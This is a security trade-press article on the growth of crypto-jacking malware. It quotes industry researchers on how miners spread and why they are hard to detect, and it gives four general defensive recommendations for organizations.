Crypto-jacking's alarming rise: How to defend against attacks

Crypto-jacking exploded on the malware scene at the end of last year and continues to grow in popularity. That's why organizations need to take steps to protect themselves from malicious crypto-mining attacks.

Crypto-jacking occurs when malware used to mine virtual currency is placed surreptitiously on a computer, other device, or web browser. The bad app "cooks" in the background, generating money for the attacker and headaches for the victim.

During the last quarter of 2017, only 13% of businesses reported malicious crypto-miners on their systems, according to Fortinet's first-quarter threat landscape report. That number more than doubled in the first three months of 2018, to 28%.

Matt Downing, principal threat intelligence researcher at Alert Logic, a consulting and managed security services provider, said the increase was alarming.

"The volume of coin-mining attack attempts that we're seeing eclipses all other motives."
—Matt Downing

At the end of last year, the spike in crypto-jacking was insane, said Adam Kujawa, director of the labs at Malwarebytes, an anti-malware software maker.

"We've never seen any type of malware detected that much."
Adam Kujawa

What's so appealing to net bandits about coin mining is that it's less risky than other forms of cybercrime. Dave Jevans, CEO of CipherTrace, a provider of cryptocurrency anti-money laundering, blockchain forensics, and enforcement, said virtual currencies are practically untrackable, and that miners are less likely to appear on the radar of law enforcement authorities than, say, ransomware.

"If you take a hospital offline, people care a lot. If you slow down people's computers a bunch, the cops probably aren't coming after you."
Dave Jevans

Here's what your organization needs to understand about crypto-jacking, along with four ways to defend against it.

State of Security Operations 2018

Time-tested techniques

Malicious crypto-miners use tried-and-true techniques to attack systems. These include phishing, drive-by downloads, exploitation of known vulnerabilities, cross-site scripting, and SQL injection.

For the less technically adept, automation tools are available, said Vishruta Rudresh, senior cybersecurity researcher at Kudelski Security, a custom cybersecurity solutions provider.

"There are crypto-mining kits available on the dark web for as little as $30."
Vishruta Rudresh

Alert Logic's Downing added that the bulk of crypto-mining attacks he has seen deploy cookie-cutter components. "They're using cut-and-paste exploits and simple shell scripts," he noted.

And malicious crypto-miners aren't shy about exploiting vulnerabilities suitable for any kind of malicious activity. "Drupal vulnerabilities can be exploited to drop any arbitrary payload, but crypto-mining is a popular one right now," said Michael Marriott, a research analyst with Digital Shadows, a threat intelligence company.

Crypto-hijackers are also exploiting the Eternal Blue vulnerability used by the WannaCry ransomware attack and Apache Struts, the vulnerability exploited in the Equifax data breach, which compromised the personal information of 145.5 million people.

One crypto-mining method that departs from typical attacks, however, involves infecting a browser. When a visitor lands on a compromised website, malicious JavaScript is injected into the user's browser. That turns the browser into a crypto-miner.

What makes that form of crypto-mining insidious is that it works across platforms. "It works on the Mac, Windows, and Android, which makes the threat more widespread," CipherTrace's Jevans observed.

"In many cases, crypto-mining can be picked up with antivirus software, but how many people have antivirus on a Mac or Android?"
—Dave Jevans

Why crypto-mining is hard to catch

Typical signs of a crypto-mining operation include increased CPU usage, degraded system performance, and sluggish application responsiveness. Demands imposed by crypto-mining can have serious consequences. "In one instance, crypto-mining software was known to destroy the device that hosted it," Kudelski's Rudresh said.

Even if signs of crypto-jacking appear on a system, finding the malware can be challenging. System defenses that depend on software signatures and anomalies, such as modified files or system data, can struggle to identify crypto-mining malware when it lands on a network.

"Crypto-miners do not modify files, and their anomalous behavior is limited to increased CPU usage or power consumption," Rudresh said. "That can be hard to attribute specifically to a crypto-miner, since there can be other applications—games, for instance—that tend to over-consume the processing capabilities of a system."

Increased CPU usage is easier for an individual to recognize than it is for a typical enterprise. "A large organization may observe it in hindsight, following increased electricity bills and a degradation of performance by the affected machines," Digital Shadows' Marriott said.

How to protect yourself from crypto-jackers

What can organizations do to protect themselves from malicious crypto-miners? Here are four recommendations from security experts:

1. Solid security hygiene matters

The baseline of any good cybersecurity defense scheme is solid security hygiene. That's true for lowering the risk of crypto-mining, too. "A lot of these attacks are just a hygiene issue," Alert Logic's Downing said. "The vast majority of these attacks are opportunistic. An attacker is going to run a number of exploits on your site, and if you have them patched, that strategy won't work."

2. Double down on common attack defenses

Since crypto-miners employ many of the same techniques as other malicious actors, defenses should be locked down against common attack vectors. These include malicious links, poisoned email attachments and files, and infected websites and applications.

3. Browser extensions deliver good blocking

When a crypto-miner is using a victim's browser to mine virtual money, it will hook into websites for coining the cash. Blocking access to those sites from within a browser will ruin a crypto-miner's day. In Google's Chrome browser, there are free extensions such as No Coin and minerBlock that will automate the blocking process. Ad blocking extensions such as AdBlocker can also be manually configured to stymie crypto-mining sites.

4. Network monitoring can net the bad ones

Crypto-mining attacks follow a pattern. They'll typically run a known exploit against an application. They'll deliver a "dropper" script that's used to load the crypto-mining malware from the Internet. They'll start using CPU resources. They'll use public pools to mine their coins. All those stages can be identified with vigilant network monitoring.

Crypto-jacking may be just the beginning

Crypto-mining malware can do more than just mine crypto-currency. "It's well-versed in espionage," Kudelski's Rudresh said. Its repertoire can include dropping additional malware on a system, exploiting unpatched vulnerabilities, stealing passwords, and monitoring user activity.

The steps for infecting a machine with crypto-mining malware are the same as those used by any threat actor. First, compromise a machine, then install the malware. "Once the threat actor has that access, they can install their malware of choice," Digital Shadows' Marriott explained.

Right now crypto-miners don't seem very interested in engaging in other malicious activity with their malware.

"We don't typically see any sort of secondary activity. The attackers are very single-minded. They deploy their mining software and let it run."
—Matt Downing

However, that may not be the case in the future. "After the value of crypto-currency drops, suddenly all these infected systems with miners may start pushing out something else, like ransomware," Kujawa said.

Compared to other types of malware, including ransomware, crypto-mining software may seem relatively benign. That's not the case, however. "If an actor has exploited a vulnerability to mine crypto-currency, that vulnerability can also be exploited to drop other payloads," Marriott explained. "In this sense, it can be indicative of a wider problem."

It's the means by which the actor was able to install the crypto-miner in the first place that should be of real concern, Marriott stressed.

"If they have this access, there are countless different types of payloads that they can then install, ranging from malware that gathers information from your machines to others that might sabotage your network."
—Michael Marriott

State of Security Operations 2018
Topics: Security